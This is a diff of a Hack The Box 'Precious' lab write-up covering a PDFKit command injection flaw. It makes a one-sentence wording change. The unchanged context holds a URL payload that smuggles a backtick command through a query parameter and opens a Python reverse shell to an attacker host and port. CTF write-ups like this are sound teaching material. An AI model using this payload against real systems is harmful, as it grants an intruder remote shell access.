raDiaSmO/HackTheBoxUtils/Precious/Writeup.md

 The version used is affected by a command injection vulnerability: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

-The original attack vector can now be replaced with directly launching a reverse shell from the target to the attacker machine.
+The original attack vector can now be replaced by launching a reverse shell directly from the target to the attacker machine.
 We can generate a payload to exploit the flaw in the web application:
 ```
 http://example.com/?name=#{'%20`export RHOST="10.10.14.39";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'`'}
 ```